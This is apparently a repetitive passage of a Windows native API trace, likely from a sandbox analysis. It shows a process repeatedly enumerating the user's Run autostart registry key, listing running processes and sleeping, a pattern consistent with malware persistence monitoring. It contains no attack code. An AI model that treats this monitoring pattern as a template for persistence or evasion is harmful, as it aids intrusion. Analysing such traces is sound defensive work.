[0174.215] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.216] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.216] NtClose (Handle=0x274) returned 0x0 [0174.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.225] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.227] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.229] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.229] NtClose (Handle=0x274) returned 0x0 [0174.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.231] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.236] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.239] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.240] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.240] NtClose (Handle=0x274) returned 0x0 [0174.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.247] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.253] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.254] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.254] NtClose (Handle=0x274) returned 0x0 [0174.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.262] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.263] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.264] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.264] NtClose (Handle=0x274) returned 0x0 [0174.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.275] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.279] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.280] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.280] NtClose (Handle=0x274) returned 0x0 [0174.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.293] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.296] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.297] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.297] NtClose (Handle=0x274) returned 0x0 [0174.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.304] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.305] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.306] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.306] NtClose (Handle=0x274) returned 0x0 [0174.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.314] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.315] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.316] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.316] NtClose (Handle=0x274) returned 0x0 [0174.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.325] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.327] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.328] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.328] NtClose (Handle=0x274) returned 0x0 [0174.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.335] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.338] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.339] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.339] NtClose (Handle=0x274) returned 0x0 [0174.339] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.346] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.348] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.349] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.349] NtClose (Handle=0x274) returned 0x0 [0174.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.352] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.359] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.361] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.362] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.362] NtClose (Handle=0x274) returned 0x0 [0174.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.374] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.377] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.378] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.378] NtClose (Handle=0x274) returned 0x0 [0174.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 